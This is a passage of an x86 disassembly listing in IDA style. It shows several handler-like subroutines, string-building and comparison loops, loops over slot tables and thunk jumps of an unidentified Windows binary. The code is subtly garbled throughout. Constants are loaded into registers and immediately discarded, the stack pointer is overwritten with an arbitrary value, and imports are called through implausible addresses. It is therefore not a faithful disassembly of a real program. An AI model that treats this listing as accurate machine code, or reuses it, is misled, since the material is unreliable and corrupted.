push dword ptr [ebp+0Ch]
push 734A9h
call sub_417361
add esp, 10h
loc_4019EB: ; CODE XREF: sub_40177B+96�j
; sub_40177B+232�j ...
call sub_40467F
retn 1Ch
sub_40177B endp
; =============== S U B R O U T I N E =======================================
sub_4019F3 proc near ; DATA XREF: J8@F_7_S:off_420AEC�o
push 39A54h
mov ebp, 681CD2h
call sub_404635
cmp dword ptr [ebp+1Ch], 3
mov eax, [ebp+10h]
mov edi, [ebp+20h]
mov [ebp-4C4h], eax
mov eax, [ebp+18h]
mov [ebp-4C0h], eax
mov [ebp-4BCh], edi
jl loc_401BFF
mov edx, 0E781CDh
xor ebx, ebx
push esi
lea eax, [ebp-18Fh]
push ebx
push eax
mov [ebp-190h], bl
call sub_407B70
push esi
lea eax, [ebp-0CFh]
push ebx
push eax
mov [ebp-0D0h], bl
call sub_407B70
push dword ptr [edi+4]
lea edi, [ebp-190h]
call sub_41B7F9
push 73C0E6h
lea esi, [ebp-0D0h]
mov ebx, offset aNbEdGzDdnbgNdZ ; "¡×¥¤Ð£§Ñ¤¤¡£Ð¤Ð§ÑÑ£¬¤Ó×ÖЬ ¢¢×¦ ÐЦ"...
call sub_4196D1
add esp, 20h
cmp byte ptr [ebp+8], 0
jz short loc_401A8F
cmp ds:byte_425222, 0
jz loc_401C15
loc_401A8F: ; CODE XREF: sub_4019F3+8D�j
lea ecx, [ebp-0D0h]
lea eax, [ebp-190h]
loc_401A9B: ; CODE XREF: sub_4019F3+C0�j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_401AB9
test dl, dl
jz short loc_401AB5
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_401AB9
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_401A9B
loc_401AB5: ; CODE XREF: sub_4019F3+B0�j
xor eax, eax
jmp short loc_401ABE
; ---------------------------------------------------------------------------
loc_401AB9: ; CODE XREF: sub_4019F3+AC�j
; sub_4019F3+B8�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401ABE: ; CODE XREF: sub_4019F3+C4�j
test eax, eax
jnz loc_401BF2
push 39E073h
push eax
lea eax, [ebp-4B8h]
push eax
call sub_407B70
push dword ptr [ebp-4C0h]
mov esi, 6B9E07h
push esi
mov eax, 8DEE78h
lea eax, [ebp-4B8h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-4B8h]
add esp, 1Ch
lea ecx, [eax+1]
loc_401B02: ; CODE XREF: sub_4019F3+114�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B02
push dword ptr [ebp-4C4h]
sub eax, ecx
push esi
mov [ebp+eax-4B8h], dl
lea eax, [ebp-3B8h]
push 22h
push eax
call sub_402AEE
lea eax, [ebp-3B8h]
add esp, 10h
lea ecx, [eax+1]
loc_401B33: ; CODE XREF: sub_4019F3+145�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B33
mov ebx, [ebp-4BCh]
push dword ptr [ebx+8]
sub eax, ecx
push esi
mov [ebp+eax-3B8h], dl
lea eax, [ebp-395h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-395h]
add esp, 10h
lea ecx, [eax+1]
loc_401B66: ; CODE XREF: sub_4019F3+178�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B66
push dword ptr [ebx+0Ch]
sub eax, ecx
push esi
mov [ebp+eax-395h], dl
lea eax, [ebp-295h]
push edi
push eax
call sub_402AEE
lea eax, [ebp-295h]
add esp, 10h
lea ecx, [eax+1]
loc_401B93: ; CODE XREF: sub_4019F3+1A5�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401B93
sub eax, ecx
mov [ebp+eax-295h], dl
mov al, [ebp+8]
mov [ebp-192h], al
mov al, [ebp+0Ch]
push 8
mov [ebp-193h], al
mov byte ptr [ebp-195h], 1
mov byte ptr [ebp-194h], 1
call sub_40304B
pop ecx
mov [ebp-4BCh], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_401C15
push 46F73Ch
lea ecx, [ebp-4B8h]
mov ebx, 0C637B9h
mov esi, eax
call sub_4140AB
jmp short loc_401C15
; ---------------------------------------------------------------------------
loc_401BF2: ; CODE XREF: sub_4019F3+CD�j
push 631BDCh
push dword ptr [ebp-4C0h]
jmp short loc_401C05
; ---------------------------------------------------------------------------
loc_401BFF: ; CODE XREF: sub_4019F3+2E�j
push 718DEEh
push eax
loc_401C05: ; CODE XREF: sub_4019F3+20A�j
push dword ptr [ebp+0Ch]
push 38C6F7h
call sub_417361
add esp, 10h
loc_401C15: ; CODE XREF: sub_4019F3+96�j
; sub_4019F3+1E4�j ...
call sub_40467F
retn 1Ch
sub_4019F3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C1D proc near ; DATA XREF: J8@F_7_S:off_420B04�o
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 118h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_10]
push ebx
mov [ebp+var_118], eax
push esi
push edi
xor eax, eax
xor ecx, ecx
mov [ebp+var_14], cl
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
push 5C637Bh
stosb
push ecx
lea eax, [ebp+var_113]
push eax
mov [ebp+var_114], cl
call sub_407B70
push ds:dword_4269BC
lea esi, [ebp+var_14]
call sub_418FC6
push 2E31BDh
lea esi, [ebp+var_114]
mov ebx, offset byte_425061
call sub_4196D1
mov eax, esi
push eax
push ds:dword_426594
lea eax, [ebp+var_14]
push eax
push 1718DEh
push [ebp+var_118]
push [ebp+arg_4]
push 4B8C6Fh
call sub_417361
mov ecx, [ebp+var_4]
add esp, 30h
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 1Ch
sub_401C1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401CC0 proc near ; DATA XREF: J8@F_7_S:off_420BC4�o
var_444 = byte ptr -444h
var_440 = dword ptr -440h
var_43C = dword ptr -43Ch
var_438 = byte ptr -438h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_418 = byte ptr -418h
var_417 = byte ptr -417h
var_408 = byte ptr -408h
var_407 = byte ptr -407h
var_308 = byte ptr -308h
var_307 = byte ptr -307h
var_208 = byte ptr -208h
var_207 = byte ptr -207h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 444h
mov eax, ds:dword_423064
xor eax, esp
mov [esp+444h+var_4], eax
mov eax, [ebp+arg_10]
push ebx
push esi
push edi
mov ebx, 0A32E31h
push esi
mov [esp+454h+var_43C], eax
xor ebx, ebx
lea eax, [esp+454h+var_107]
push ebx
push eax
mov [esp+45Ch+var_108], 0
call sub_407B70
add esp, 0Ch
push esi
lea eax, [esp+454h+var_307]
push ebx
push eax
mov [esp+45Ch+var_308], bl
call sub_407B70
xor eax, eax
mov [esp+45Ch+var_418], bl
lea edi, [esp+45Ch+var_417]
stosd
stosd
stosd
stosw
add esp, 0Ch
push esi
stosb
lea eax, [esp+454h+var_407]
push ebx
push eax
mov [esp+45Ch+var_408], bl
call sub_407B70
add esp, 0Ch
push esi
lea eax, [esp+454h+var_207]
push ebx
push eax
mov [esp+45Ch+var_208], bl
call sub_407B70
add esp, 0Ch
push 8
pop ecx
xor eax, eax
lea edi, [esp+450h+var_438]
rep stosd
lea eax, [esp+450h+var_438]
mov eax, 49665Ch
push eax
mov [esp+454h+var_440], ebx
call dword ptr ds:2CB32Eh
mov edi, [esp+450h+var_430]
mov ecx, [esp+450h+var_42C]
shr edi, 14h
shr ecx, 14h
mov eax, edi
sub eax, ecx
push 1
mov ecx, ebx
lea esi, [esp+454h+var_108]
mov dword ptr [esp+454h+var_444], eax
call sub_418E51
pop ecx
call sub_41A391
push 1
push ebx
lea esi, [esp+458h+var_308]
call sub_418E1F
push ds:dword_4269BC
lea esi, [esp+45Ch+var_418]
call sub_418FC6
add esp, 0Ch
lea eax, [esp+450h+var_440]
push eax
lea eax, [esp+454h+var_408]
push eax
call dword ptr ds:165997h
push ebx
lea eax, [esp+454h+var_208]
push eax
call dword ptr ds:0B2CCBh
call sub_418DA0
push ds:dword_4265AC
lea eax, [esp+454h+var_208]
push ds:dword_4265A8
push ds:dword_4265A4
push ds:dword_4265A0
push ds:dword_42659C
push ds:dword_426598
push eax
lea eax, [esp+46Ch+var_408]
push eax
mov eax, esi
push eax
lea eax, [esp+474h+var_308]
push eax
push edi
push dword ptr [esp+47Ch+var_444]
mov ecx, 60B2CCh
push ds:dword_426BE8
lea eax, [esp+484h+var_108]
push esi
push ds:dword_426BEC
push eax
push 385966h
push [esp+494h+var_43C]
push [ebp+arg_4]
push 1C2CB3h
call sub_417361
push 0E1659h
push 0
push esi
call sub_407B70
mov ecx, [esp+4ACh+var_4]
add esp, 5Ch
pop edi
pop esi
pop ebx
xor ecx, esp
call sub_402710
mov esp, ebp
pop ebp
retn 1Ch
sub_401CC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E82 proc near ; DATA XREF: J8@F_7_S:off_420BCC�o
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_10]
push esi
push edi
push ds:dword_4269BC
mov [ebp+var_14], 0
xor eax, eax
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
lea esi, [ebp+var_14]
stosb
call sub_418FC6
pop ecx
mov eax, esi
push eax
call dword ptr ds:470B2Ch
push 2
mov [ebp+var_18], eax
push 4
lea eax, [ebp+var_18]
push eax
call dword ptr ds:238596h
test eax, eax
jnz short loc_401EEF
mov eax, esi
push eax
push 11C2CBh
push ebx
push [ebp+arg_4]
push 48E165h
call sub_417361
add esp, 14h
jmp short loc_401F0B
; ---------------------------------------------------------------------------
loc_401EEF: ; CODE XREF: sub_401E82+50�j
push dword ptr [eax]
lea eax, [ebp+var_14]
push eax
push 2470B2h
push ebx
push [ebp+arg_4]
push 123859h
call sub_417361
add esp, 18h
loc_401F0B: ; CODE XREF: sub_401E82+6B�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 1Ch
sub_401E82 endp
; =============== S U B R O U T I N E =======================================
sub_401F1C proc near ; DATA XREF: J8@F_7_S:off_420D1C�o
push 60h
mov edx, 6C48E1h
call sub_404635
mov eax, [ebp+18h]
mov [ebp-68h], eax
xor eax, eax
mov byte ptr [ebp-30h], 0
lea edi, [ebp-2Fh]
stosd
stosd
stosd
mov ebx, [ebp+20h]
stosw
and dword ptr [ebp-58h], 0
and dword ptr [ebp-48h], 0
stosb
xor eax, eax
mov byte ptr [ebp-20h], 0
lea edi, [ebp-1Fh]
stosd
stosd
stosd
stosw
stosb
or edi, 0FFFFFFFFh
cmp ds:byte_433945, 0
mov [ebp-50h], ebx
mov byte ptr [ebp-41h], 0
mov [ebp-5Ch], edi
mov [ebp-60h], edi
mov [ebp-64h], edi
mov [ebp-6Ch], edi
jnz short loc_401F83
call sub_41B775
test al, al
jz loc_402432
loc_401F83: ; CODE XREF: sub_401F1C+58�j
cmp ds:byte_4268B4, 0
jnz short loc_401F99
call sub_418D17
test al, al
jz loc_402432
loc_401F99: ; CODE XREF: sub_401F1C+6E�j
and dword ptr [ebp-54h], 0
mov ecx, 6B7C48h
mov eax, ecx
lea esi, [eax+1]
loc_401FA7: ; CODE XREF: sub_401F1C+90�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401FA7
jmp short loc_401FF6
; ---------------------------------------------------------------------------
loc_401FB0: ; CODE XREF: sub_401F1C+DC�j
mov edx, [ebx+4]
mov eax, ecx
loc_401FB5: ; CODE XREF: sub_401F1C+B1�j
mov cl, [eax]
cmp cl, [edx]
jnz short loc_401FD3
test cl, cl
jz short loc_401FCF
mov cl, [eax+1]
cmp cl, [edx+1]
jnz short loc_401FD3
inc eax
inc eax
inc edx
inc edx
test cl, cl
jnz short loc_401FB5
loc_401FCF: ; CODE XREF: sub_401F1C+A1�j
xor eax, eax
jmp short loc_401FD7
; ---------------------------------------------------------------------------
loc_401FD3: ; CODE XREF: sub_401F1C+9D�j
; sub_401F1C+A9�j
sbb eax, eax
sbb eax, edi
loc_401FD7: ; CODE XREF: sub_401F1C+B5�j
test eax, eax
jz short loc_401FFC
inc dword ptr [ebp-54h]
mov ecx, [ebp-54h]
imul ecx, 2Ch
lea ecx, dword_424528[ecx]
mov eax, ecx
lea esi, [eax+1]
loc_401FEF: ; CODE XREF: sub_401F1C+D8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401FEF
loc_401FF6: ; CODE XREF: sub_401F1C+92�j
sub eax, esi
jnz short loc_401FB0
jmp short loc_402001
; ---------------------------------------------------------------------------
loc_401FFC: ; CODE XREF: sub_401F1C+BD�j
cmp [ebp-54h], edi
jnz short loc_40201E
loc_402001: ; CODE XREF: sub_401F1C+DE�j
push 3DBE24h
push dword ptr [ebp-68h]
push dword ptr [ebp+0Ch]
push 5EDF12h
call sub_417361
add esp, 10h
jmp loc_402432
; ---------------------------------------------------------------------------
loc_40201E: ; CODE XREF: sub_401F1C+E3�j
mov esi, [ebx+8]
mov eax, esi
mov edx, 85EDF1h
call sub_419044
test eax, eax
jz short loc_402043
push dword ptr [ebx+0Ch]
mov byte ptr [ebp-41h], 1
call sub_403ECE
pop ecx
mov [ebp-4Ch], eax
jmp short loc_4020A0
; ---------------------------------------------------------------------------
loc_402043: ; CODE XREF: sub_401F1C+113�j
push esi
call sub_403ECE
pop ecx
push 3
pop edx
cmp [ebp+1Ch], edx
mov [ebp-4Ch], eax
mov [ebp-48h], edx
jl short loc_402099
mov eax, edx
loc_40205A: ; CODE XREF: sub_401F1C+17B�j
mov ecx, [ebp-50h]
mov eax, [ecx+eax*4]
mov edi, eax
mov edi, 0E72BDBh
mov ecx, edx
xor ebx, ebx
repe cmpsb
jz short loc_4020E7
mov edi, eax
mov ebx, 0CF72BDh
mov ecx, edx
xor ebx, ebx
repe cmpsb
jz short loc_402099
mov edi, eax
mov ebx, 0E67B95h
mov ecx, edx
xor eax, eax
repe cmpsb
jz short loc_4020ED
inc dword ptr [ebp-48h]
movzx eax, word ptr [ebp-48h]
cmp eax, [ebp+1Ch]
jle short loc_40205A
loc_402099: ; CODE XREF: sub_401F1C+13A�j
; sub_401F1C+160�j
mov dword ptr [ebp-48h], 1
loc_4020A0: ; CODE XREF: sub_401F1C+125�j
; sub_401F1C+1CF�j ...
xor eax, eax
loc_4020A2: ; CODE XREF: sub_401F1C+19C�j
cmp ds:byte_426D01[eax], 0
jz short loc_4020AE
inc dword ptr [ebp-58h]
loc_4020AE: ; CODE XREF: sub_401F1C+18D�j
add eax, 124h
cmp eax, 7D9EE5h
jbe short loc_4020A2
mov ecx, [ebp-58h]
mov esi, 0FECF7h
sub eax, ecx
cmp eax, [ebp-4Ch]
jnb short loc_4020F6
push eax
push 7F67Bh
push dword ptr [ebp-68h]
push dword ptr [ebp+0Ch]
push offset byte_43FB3D
call sub_417361
add esp, 14h
jmp loc_402432
; ---------------------------------------------------------------------------
loc_4020E7: ; CODE XREF: sub_401F1C+151�j
and dword ptr [ebp-48h], 0
jmp short loc_4020A0
; ---------------------------------------------------------------------------
loc_4020ED: ; CODE XREF: sub_401F1C+16F�j
mov dword ptr [ebp-48h], 2
jmp short loc_4020A0
; ---------------------------------------------------------------------------
loc_4020F6: ; CODE XREF: sub_401F1C+1AB�j
add [ebp-4Ch], ecx
cmp byte ptr [ebp-41h], 0
jz loc_40221D
mov eax, [ebp-50h]
push dword ptr [eax+8]
lea eax, [ebp-30h]
push 21FD9Eh
push 0Fh
pop ebx
push ebx
push eax
call sub_402AEE
lea eax, [ebp-30h]
add esp, 10h
lea ecx, [eax+1]
loc_402124: ; CODE XREF: sub_401F1C+20D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402124
sub eax, ecx
mov [ebp+eax-30h], dl
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-64h]
push eax
lea eax, [ebp-60h]
push eax
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-30h]
push 50FECFh
push eax
call sub_4035E4
add esp, 18h
cmp dword ptr [ebp-5Ch], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_40216C
push 687F67h
push ebx
push eax
call sub_402AEE
add esp, 0Ch
jmp short loc_40217E
; ---------------------------------------------------------------------------
loc_40216C: ; CODE XREF: sub_401F1C+23D�j
push dword ptr [ebp-5Ch]
push 743FB3h
push ebx
push eax
call sub_402AEE
add esp, 10h
loc_40217E: ; CODE XREF: sub_401F1C+24E�j
cmp dword ptr [ebp-60h], 0FFFFFFFFh
mov esi, 8F43FBh
mov edi, 0C8F43Fh
lea eax, [ebp-20h]
jnz short loc_40219F
push eax
push edi
push ebx
push eax
call sub_402AEE
add esp, 10h
jmp short loc_4021B1
; ---------------------------------------------------------------------------
loc_40219F: ; CODE XREF: sub_401F1C+273�j
push dword ptr [ebp-60h]
push eax
push esi
lea eax, [ebp-20h]
push ebx
push eax
call sub_402AEE
add esp, 14h
loc_4021B1: ; CODE XREF: sub_401F1C+281�j
cmp dword ptr [ebp-64h], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_4021C8
push eax
push edi
push ebx
push eax
call sub_402AEE
add esp, 10h
jmp short loc_4021DA
; ---------------------------------------------------------------------------
loc_4021C8: ; CODE XREF: sub_401F1C+29C�j
push dword ptr [ebp-64h]
push eax
push esi
lea eax, [ebp-20h]
push ebx
push eax
call sub_402AEE
add esp, 14h
loc_4021DA: ; CODE XREF: sub_401F1C+2AA�j
cmp dword ptr [ebp-6Ch], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_4021F5
push eax
push 6C7A1Fh
push ebx
push eax
call sub_402AEE
add esp, 10h
jmp short loc_40220B
; ---------------------------------------------------------------------------
loc_4021F5: ; CODE XREF: sub_401F1C+2C5�j
push dword ptr [ebp-6Ch]
push eax
push 763D0Fh
lea eax, [ebp-20h]
push ebx
push eax
call sub_402AEE
add esp, 14h
loc_40220B: ; CODE XREF: sub_401F1C+2D7�j
lea eax, [ebp-20h]
lea edx, [eax+1]
loc_402211: ; CODE XREF: sub_401F1C+2FA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402211
jmp loc_4022F6
; ---------------------------------------------------------------------------
loc_40221D: ; CODE XREF: sub_401F1C+1E1�j
push ds:dword_4269BC
mov byte ptr [ebp-40h], 0
xor eax, eax
lea edi, [ebp-3Fh]
stosd
stosd
stosd
stosw
lea esi, [ebp-40h]
stosb
call sub_418FC6
xor eax, eax
lea edi, [ebp-30h]
stosd
stosd
stosd
stosd
mov eax, esi
push eax
push 7B1E87h
push 0Fh
pop esi
lea eax, [ebp-30h]
push esi
push eax
call sub_402AEE
lea eax, [ebp-30h]
add esp, 14h
lea ecx, [eax+1]
loc_402261: ; CODE XREF: sub_401F1C+34A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402261
sub eax, ecx
mov [ebp+eax-30h], dl
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-64h]
push eax
lea eax, [ebp-60h]
push eax
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-30h]
push 3D8F43h
push eax
call sub_4035E4
mov eax, [ebp-48h]
add esp, 18h
sub eax, 0
jz short loc_4022D4
dec eax
jz short loc_4022BA
dec eax
jnz short loc_4022E9
push dword ptr [ebp-64h]
lea eax, [ebp-20h]
push dword ptr [ebp-60h]
push dword ptr [ebp-5Ch]
push 1EC7A1h
push esi
push eax
call sub_402AEE
add esp, 18h
jmp short loc_4022E9
; ---------------------------------------------------------------------------
loc_4022BA: ; CODE XREF: sub_401F1C+37C�j
push dword ptr [ebp-60h]
lea eax, [ebp-20h]
push dword ptr [ebp-5Ch]
push 4F63D0h
push esi
push eax
call sub_402AEE
add esp, 14h
jmp short loc_4022E9
; ---------------------------------------------------------------------------
loc_4022D4: ; CODE XREF: sub_401F1C+379�j
push dword ptr [ebp-5Ch]
lea eax, [ebp-20h]
push 27B1E8h
push esi
push eax
call sub_402AEE
add esp, 10h
loc_4022E9: ; CODE XREF: sub_401F1C+37F�j
; sub_401F1C+39C�j ...
lea eax, [ebp-20h]
lea edx, [eax+1]
loc_4022EF: ; CODE XREF: sub_401F1C+3D8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4022EF
loc_4022F6: ; CODE XREF: sub_401F1C+2FC�j
sub eax, edx
cmp byte ptr [ebp-41h], 0
mov byte ptr [ebp+eax-20h], 0
mov eax, [ebp-50h]
jz short loc_40230B
push dword ptr [eax+0Ch]
jmp short loc_40230E
; ---------------------------------------------------------------------------
loc_40230B: ; CODE XREF: sub_401F1C+3E8�j
push dword ptr [eax+8]
loc_40230E: ; CODE XREF: sub_401F1C+3ED�j
call sub_403ECE
push eax
mov eax, [ebp-54h]
imul eax, 2Ch
push ds:dword_424548[eax]
lea eax, [ebp-20h]
push eax
push 53D8F4h
push dword ptr [ebp-68h]
push dword ptr [ebp+0Ch]
push 69EC7Ah
call sub_417361
add esp, 20h
call sub_4192FB
mov ecx, [ebp-4Ch]
cmp [ebp-58h], ecx
jnb loc_402432
mov eax, [ebp-58h]
imul eax, 124h
sub ecx, [ebp-58h]
mov [ebp-50h], eax
mov [ebp-4Ch], ecx
mov esi, eax
loc_402361: ; CODE XREF: sub_401F1C+510�j
push 34F63Dh
lea ebx, dword_426CF0[esi]
lea edi, [ebx-100h]
push 0
push edi
call sub_407B70
lea eax, [ebp-30h]
push eax
push 1A7B1Eh
push 0Fh
push ebx
call sub_402AEE
mov eax, ebx
add esp, 1Ch
lea ecx, [eax+1]
loc_402393: ; CODE XREF: sub_401F1C+47C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402393
push dword ptr [ebp-68h]
sub eax, ecx
mov byte ptr ds:dword_426CF0[esi+eax], dl
mov al, [ebp-41h]
push 4D3D8Fh
mov [ebx+12h], al
mov eax, [ebp-48h]
push 269EC7h
push edi
mov [ebx+18h], eax
call sub_402AEE
mov eax, edi
add esp, 10h
lea ecx, [eax+1]
loc_4023CA: ; CODE XREF: sub_401F1C+4B3�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4023CA
sub eax, ecx
mov ds:byte_426BF0[esi+eax], dl
mov al, [ebp+0Ch]
mov [ebx+10h], al
mov eax, [ebp-54h]
push 8
mov byte ptr [ebx+11h], 1
mov [ebx+14h], eax
call sub_40304B
pop ecx
mov [ebp-58h], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_402415
mov ecx, edi
push 534F63h
mov esp, 0A534F6h
mov esi, eax
call sub_4140AB
mov esi, [ebp-50h]
jmp short loc_402417
; ---------------------------------------------------------------------------
loc_402415: ; CODE XREF: sub_401F1C+4DF�j
xor eax, eax
loc_402417: ; CODE XREF: sub_401F1C+4F7�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [eax]
add esi, 124h
dec dword ptr [ebp-4Ch]
mov [ebx+20h], eax
mov [ebp-50h], esi
jnz loc_402361
loc_402432: ; CODE XREF: sub_401F1C+61�j
; sub_401F1C+77�j ...
call sub_40467F
retn 1Ch
sub_401F1C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40243A proc near ; DATA XREF: J8@F_7_S:off_420D24�o
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 1Ch
and [esp+1Ch+var_1C], 0
push ebx
push esi
mov edi, 6694D3h
push edi
mov [esp+28h+var_10], ebx
loc_402453: ; CODE XREF: sub_40243A+83�j
; sub_40243A+A0�j ...
mov eax, ds:dword_433C4C
mov eax, [eax]
mov [esp+28h+var_14], eax
mov [esp+28h+var_18], ebx
loc_402462: ; CODE XREF: sub_40243A+67�j
mov eax, ds:dword_433C4C
lea edi, [esp+28h+var_10]
lea esi, [esp+28h+var_18]
mov [esp+28h+var_C], eax
call sub_40166F
test al, al
jz short loc_4024F5
mov edx, 0C7694Dh
call sub_40164F
mov esi, eax
add esi, 5
push 8
pop ecx
xor eax, eax
repe cmpsb
lea esi, [esp+28h+var_18]
jz short loc_4024A3
lea edi, [esp+28h+var_8]
call sub_40168C
jmp short loc_402462
; ---------------------------------------------------------------------------
loc_4024A3: ; CODE XREF: sub_40243A+5C�j
call sub_40164F
mov edi, [eax+40h]
lea esi, [esp+28h+var_18]
call sub_40164F
mov eax, [eax]
call sub_414023
test al, al
jz short loc_402453
xor eax, eax
xor ecx, ecx
loc_4024C3: ; CODE XREF: sub_40243A+9E�j
cmp ds:dword_426D10[ecx], edi
jz short loc_4024DF
add ecx, 124h
inc eax
cmp ecx, 0CD50h
jbe short loc_4024C3
jmp loc_402453
; ---------------------------------------------------------------------------
loc_4024DF: ; CODE XREF: sub_40243A+8F�j
inc [esp+28h+var_1C]
imul eax, 124h
mov ds:byte_426D01[eax], 0
jmp loc_402453
; ---------------------------------------------------------------------------
loc_4024F5: ; CODE XREF: sub_40243A+40�j
push [esp+28h+var_1C]
push 6BB4A6h
push [ebp+arg_10]
push [ebp+arg_4]
push 35DA53h
call sub_417361
add esp, 14h
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 1Ch
sub_40243A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=188h
sub_40251A proc near ; DATA XREF: J8@F_7_S:off_420D2C�o
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
lea ebp, [esp-188h]
sub esp, 208h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+188h+var_4], eax
mov eax, [ebp+188h+arg_10]
push esi
push edi
mov edx, 0AB5DA5h
push esi
mov [ebp+188h+var_208], eax
lea eax, [ebp+188h+var_203]
push 0
push eax
mov [ebp+188h+var_204], 0
call sub_407B70
push 55AED2h
lea eax, [ebp+188h+var_204]
push esi
push eax
xor edi, edi
call sub_402AEE
add esp, 18h
xor eax, eax
loc_40256B: ; CODE XREF: sub_40251A+7E�j
push ds:dword_42454C[eax]
lea eax, dword_424528[eax]
push eax
lea eax, [ebp+188h+var_204]
push eax
push 6AD769h
push esi
push eax
call sub_402AEE
add esp, 18h
inc edi
mov eax, edi
imul eax, 2Ch
cmp ds:dword_424548[eax], 0
jnz short loc_40256B
lea eax, [ebp+188h+var_204]
push eax
push 356BB4h
push esi
push eax
call sub_402AEE
push ds:dword_43394C
lea eax, [ebp+188h+var_204]
push eax
push 1AB5DAh
push esi
push eax
call sub_402AEE
push ds:dword_433940
lea eax, [ebp+188h+var_204]
push eax
push 0D5AEDh
push esi
push eax
call sub_402AEE
add esp, 38h
lea eax, [ebp+188h+var_204]
pop edi
lea edx, [eax+1]
pop esi
loc_4025E1: ; CODE XREF: sub_40251A+CC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4025E1
sub eax, edx
mov [ebp+eax+188h+var_204], cl
lea eax, [ebp+188h+var_204]
push eax
push 6AD76h
push [ebp+188h+var_208]
push [ebp+188h+arg_4]
push offset byte_4356BB
call sub_417361
mov ecx, [ebp+188h+var_4]
xor ecx, ebp
add esp, 14h
call sub_402710
add ebp, 188h
leave
retn 1Ch
sub_40251A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402624 proc near ; CODE XREF: sub_41B1A0+A6�p
jmp dword ptr ds:61AB5Dh
sub_402624 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40262A proc near ; CODE XREF: sub_41B1A0+149�p
jmp dword ptr ds:30D5AEh
sub_40262A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402630 proc near ; CODE XREF: sub_41B1A0+76�p
; sub_41B1A0+B9�p ...
jmp dword ptr ds:186AD7h
sub_402630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402636 proc near ; CODE XREF: sub_41B1A0+C8�p
; sub_41B1A0+1C0�p ...
jmp dword ptr ds:0C356Bh
sub_402636 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40263C proc near ; CODE XREF: sub_41B1A0+1B1�p
jmp dword ptr ds:461AB5h
sub_40263C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402642 proc near ; CODE XREF: sub_41A9DE+B2�p
jmp dword ptr ds:630D5Ah
sub_402642 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402648 proc near ; CODE XREF: sub_416F86+24�p
; sub_416F86+2F�p ...
jmp sub_40304B
sub_402648 endp
; =============== S U B R O U T I N E =======================================
sub_40264D proc near ; DATA XREF: J8@F_7_S:004212A4�o
mov dword ptr [ecx], offset off_41D338
jmp sub_40109A
sub_40264D endp
; ---------------------------------------------------------------------------
loc_402658: ; DATA XREF: J8@F_7_S:off_41D338�o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D338
